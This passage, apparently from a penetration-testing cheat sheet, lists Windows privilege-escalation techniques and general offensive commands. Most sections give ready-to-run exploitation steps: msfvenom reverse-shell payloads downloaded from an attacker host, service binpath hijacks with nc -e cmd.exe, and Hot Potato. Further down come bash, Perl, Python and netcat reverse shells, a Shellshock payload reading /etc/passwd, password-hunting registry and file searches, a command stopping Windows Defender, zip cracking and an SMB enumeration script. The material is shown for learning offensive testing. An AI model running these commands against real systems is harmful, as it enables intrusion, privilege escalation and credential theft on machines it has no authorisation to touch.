ModifiableFile : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files\Autorun Program\program.exe; IdentityReference=Everyone}
|
or
1
2
3
4
5
6
| winPEAS.exe
[+] Autorun Applications(T1010)
Folder: C:\Program Files\Autorun Program
File: C:\Program Files\Autorun Program\program.exe
FilePerms: Everyone [AllAccess]
|
Exploitation
1
2
3
4
5
6
7
8
9
10
| # Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
cd C:\Program Files\Autorun Program\
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', '.\program.exe')
To execute it with elevated privileges we need to wait for someone in the Admin group to login.
|
AlwaysInstallElevated
Detection
1
2
3
4
5
| powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking for AlwaysInstallElevated registry key...
AbuseFunction : Write-UserAddMSI
|
or
1
2
3
4
| reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
If both values are equal to 1 then it's vulnerable.
|
or
1
2
3
4
5
6
| winPEAS.exe
[+] Checking AlwaysInstallElevated(T1012)
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
|
Exploitation
1
2
3
4
5
6
7
8
| # Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > program.msi
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.msi', 'C:\Temp\program.msi')
msiexec /quiet /qn /i C:\Temp\program.msi
|
Executable Files
Detection
1
2
3
4
5
6
7
8
9
10
11
12
| powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking service executable and argument permissions...
ServiceName : filepermsvc
Path : "C:\Program Files\File Permissions Service\filepermservice.exe"
ModifiableFile : C:\Program Files\File Permissions Service\filepermservice.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : Everyone
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'filepermsvc'
CanRestart : True
|
or
1
2
3
4
5
6
| winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
filepermsvc(Apache Software Foundation - File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped
File Permissions: Everyone [AllAccess]
|
Exploitation
1
2
3
4
5
6
7
8
9
| # Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', 'C:\Temp\program.exe')
copy /y c:\Temp\program.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc
|
Startup applications
Detection
1
2
3
4
5
6
7
8
9
10
11
| icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
C:\>icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F)
TCM-PC\TCM:(I)(OI)(CI)(DE,DC)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
Everyone:(I)(OI)(CI)(RX)
If the user you're connecte with has full access ‘(F)’ to the directory (here Users) then it's vulnerable.
|
Exploitation
1
2
3
4
5
6
7
8
9
10
| # Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', '.\program.exe')
To execute it with elevated privileges we need to wait for someone in the Admin group to login.
|
Weak service permission
Detection
1
2
3
4
5
6
7
8
9
10
11
12
| # Find all services authenticated users have modify access onto
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
if SERVICE_ALL_ACCESS then vulnerable
# Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive.
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
|
or
1
2
3
4
5
6
7
8
9
| powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking service permissions...
ServiceName : daclsvc
Path : "C:\Program Files\DACL Service\daclservice.exe"
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
CanRestart : True
|
or
1
2
3
4
5
6
7
8
9
10
| winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped
YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles
[+] Modifiable Services(T1007)
LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
daclsvc: WriteData/CreateFiles
|
Exploitation
1
2
3
4
5
6
7
8
9
10
| # Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
sc config <SERVICENAME> binpath= "<PATH>\nc.exe <IP> <PORT> -e cmd.exe"
sc start <SERVICENAME>
or
net start <SERVICENAME>
|
Unquoted service paths
Detection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking for unquoted service paths...
ServiceName : unquotedsvc
Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\;IdentityReference=NT AUTHORITY\Authenticated Users}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart : True
ServiceName : unquotedsvc
Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart : True
|
or
1
2
3
4
5
| winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected
|
Exploitation
1
2
3
4
5
6
7
8
9
| # Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > Common.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
cd "C:\Program Files\Unquoted Path Service\"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Common.exe', '.\Common.exe')
sc start unquotedsvc
|
Hot potato
Exploitation
1
2
3
4
5
6
7
8
| # Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Tater.ps1.exe', '.\Tater.ps1.exe')
powershell -exec bypass -command "& { Import-Module .\Tater.ps1; Invoke-Tater -Trigger 1 -Command '.\nc.exe <IP> <PORT> -e cmd.exe' }"
|
CVE
1
2
3
| # Already compiled exploit
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/abatchy17/WindowsExploits
|
Windows XP
CVE | Description |
---|
CVE-2002-1214 | ms02_063_pptp_dos - exploits a kernel based overflow when sending abnormal PPTP Control Data packets - code execution, DoS |
CVE-2003-0352 | ms03_026_dcom - exploits a stack buffer overflow in the RPCSS service |
CVE-2003-0533 | MS04-011 - ms04_011_lsass - exploits a stack buffer overflow in the LSASS service |
CVE-2003-0719 | ms04_011_pct - exploits a buffer overflow in the Microsoft Windows SSL PCT protocol stack - Private communication target overflow |
CVE-2003-0812 | ms03_049_netapi - exploits a stack buffer overflow in the NetApi32 |
CVE-2003-0818 | ms04_007_killbill - vulnerability in the bit string decoding code in the Microsoft ASN.1 library |
CVE-2003-0822 | ms03_051_fp30reg_chunked - exploit for the chunked encoding buffer overflow described in MS03-051 |
CVE-2004-0206 | ms04_031_netdde - exploits a stack buffer overflow in the NetDDE service |
CVE-2010-3138 | EXPLOIT-DB 14765 - Untrusted search path vulnerability - allows local users to gain privileges via a Trojan horse |
CVE-2010-3147 | EXPLOIT-DB 14745 - Untrusted search path vulnerability in wab.exe - allows local users to gain privileges via a Trojan horse |
CVE-2010-3970 | ms11_006_createsizeddibsection - exploits a stack-based buffer overflow in thumbnails within .MIC files - code execution |
CVE-2011-1345 | Internet Explorer does not properly handle objects in memory - allows remote execution of code via object |
CVE-2011-5046 | EXPLOIT-DB 18275 - GDI in windows does not properly validate user-mode input - allows remote code execution |
CVE-2012-4349 | Unquoted windows search path - Windows provides the capability of including spaces in path names - can be root |
Windows 7
CVE | Description |
---|
CVE-2010-0232 | ms10_015_kitrap0d - create a new session with SYSTEM privileges via the KiTrap0D exploit |
CVE-2010-2568 | ms10_046_shortcut_icon_dllloader - exploits a vulnerability in the handling of Windows Shortcut files (.LNK) - run a payload |
CVE-2010-2744 | EXPLOIT-DB 15894 - kernel-mode drivers in windows do not properly manage a window class - allows privileges escalation |
CVE-2010-3227 | EXPLOIT-DB - Stack-based buffer overflow in the UpdateFrameTitleForDocument method - arbitrary code execution |
CVE-2014-4113 | ms14_058_track_popup_menu - exploits a NULL Pointer Dereference in win32k.sys - arbitrary code execution |
CVE-2014-4114 | ms14_060_sandworm - exploits a vulnerability found in Windows Object Linking and Embedding - arbitrary code execution |
CVE-2015-0016 | ms15_004_tswbproxy - abuses a process creation policy in Internet Explorer’s sandbox - code execution |
CVE-2018-8494 | remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input |
Windows 8
CVE | Description |
---|
CVE-2013-0008 | ms13_005_hwnd_broadcast - attacker can broadcast commands from lower Integrity Level process to a higher one - privilege escalation |
CVE-2013-1300 | ms13_053_schlamperei - kernel pool overflow in Win32k - local privilege escalation |
CVE-2013-3660 | ppr_flatten_rec - exploits EPATHOBJ::pprFlattenRec due to the usage of uninitialized data - allows memory corruption |
CVE-2013-3918 | ms13_090_cardspacesigninhelper - exploits CardSpaceClaimCollection class from the icardie.dll ActiveX control - code execution |
CVE-2013-7331 | ms14_052_xmldom - uses Microsoft XMLDOM object to enumerate a remote machine’s filenames |
CVE-2014-6324 | ms14_068_kerberos_checksum - exploits the Microsoft Kerberos implementation - privilege escalation |
CVE-2014-6332 | ms14_064_ole_code_execution - exploits the Windows OLE Automation array vulnerability |
CVE-2014-6352 | ms14_064_packager_python - exploits Windows Object Linking and Embedding (OLE) - arbitrary code execution |
CVE-2015-0002 | ntapphelpcachecontrol - NtApphelpCacheControl Improper Authorization Check - privilege escalation |
Windows 10
CVE | Description |
---|
CVE-2015-0057 | exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine |
CVE-2015-1769 | MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege |
CVE-2015-2426 | ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver |
CVE-2015-2479 | MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege |
CVE-2015-2513 | MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution |
CVE-2015-2423 | MS15-088 - Unsafe Command Line Parameter Passing - Could Allow Information Disclosure |
CVE-2015-2431 | MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution |
CVE-2015-2441 | MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution |
Windows Server 2003
CVE | Description |
---|
CVE-2008-4250 | ms08_067_netapi - exploits a parsing flaw in the path canonicalization code of NetAPI32.dll - bypassing NX |
CVE-2017-8487 | allows an attacker to execute code when a victim opens a specially crafted file - remote code execution |
PROOFS
Linux
1
| echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
|
Windows
1
| echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
|
REVERSE SHELL
1
2
3
4
5
6
7
8
| # Download
git clone https://github.com/ShutdownRepo/shellerator
# Install requirements
pip3 install --user -r requirements.txt
# Executable from anywhere
sudo cp shellrator.py /bin/shellrator
|
Bash
1
| bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
|
Perl
1
| perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
Python
1
| python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
Netcat
1
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f
|
More reverse shell
1
| http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
|
Interactive shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| # Python
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Bash
echo os.system('/bin/bash')
# Sh
/bin/bash -i
# Perl
perl -e 'exec "/bin/bash"'
# Ruby
exec "/bin/bash"
# Lua
os.execute('/bin/bash')
|
Adjust Interactive shell
1
2
3
4
5
6
7
| stty size # Find your terminal size -> 50 235
Ctrl-Z
stty raw -echo // Disable shell echo
fg
export SHELL=bash
export TERM=xterm OR export TERM=xterm-256color
stty rows 50 columns 235
|
SHELLSHOCK
1
| curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" <URL>/cgi-bin/<SCRIPT>
|
USEFUL LINUX COMMANDS
Find a file
1
2
| locate <FILE>
find / -name "<FILE>"
|
Active connection
List all SUID files
1
| find / -perm -4000 2>/dev/null
|
Determine the current version of Linux
List processes running
List the allowed (and forbidden) commands for the invoking use
USEFUL WINDOWS COMMANDS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| net config Workstation
systeminfo
net users
ipconfig /all
netstat -ano
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Disable windows defender
sc stop WinDefend
# Bypass restriction
powershell -nop -ep bypass
# List hidden files
dir /a
# Find a file
dir /b/s "<FILE>"
|
ZIP
1
2
3
4
| fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' file.zip
zip2john file.zip > zip.john
john --wordlist=<PASSWORDS_LIST> zip.john
|
SMBEnum Script
smbenum.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
| #!/bin/bash
# Input params
host="$1"
user="$2"
pass="$3"
# Colors
RED='\033[1;31m'
YELLOW='\033[1;33m'
GRAY='\033[0;37m'
RST='\033[0m'
# Check host
if [ -z "$host" ]
then
echo "Usage: $0 host [user] [pass]"
echo "Default user and password is 'anon'"
exit 1
fi
# Check user name and password
if [ -z "$user" ] ; then user="anon" ; fi
if [ -z "$pass" ] ; then pass="anon" ; fi
# smbclient
smbclient=$(which smbclient)
# Checks read or write permission
function checkReadWritePerm() {
local share="$1"
local tdir="$2"
local tmpFile="$3"
if $smbclient "//${host}/${share}/" -U "${user}%${pass}" -c "cd ${tdir}; put ${tmpFile}; rm ${tmpFile}" >/dev/null 2>&1
then
echo -en "${RED}WRITE\t"
echo -n ": ${share} : ${tdir}"
echo -e "${RST}"
else
echo -en "${YELLOW}READ\t"
echo -n ": ${share} : ${tdir}"
echo -e "${RST}"
fi
}
shareList=$($smbclient -g -t 2 -L "$host" -U "${user}%${pass}" 2>/dev/null | awk -F'|' '$1 == "Disk" {print $2}')
# Write file
tmpFile=tmp_$$.tmp
cd "${TMPDIR:-/tmp}"
touch ${tmpFile}
for share in $shareList
do
if $smbclient "//${host}/${share}/" -U "${user}%${pass}" -c "lcd" >/dev/null 2>&1
then
# Current dir
checkReadWritePerm "${share}" "." "${tmpFile}"
# Recursive dir
$smbclient "//${host}/${share}/" -U "${user}%${pass}" -c "recurse;dir" | egrep ^'\\' 2>/dev/null | while IFS= read -r line
do
checkReadWritePerm "${share}" "${line}" "${tmpFile}"
done
else
echo -en "${GRAY}NONE\t"
echo -n ": ${share}"
echo -e "${RST}"
fi
done
rm -f ${tmpFile}
exit
|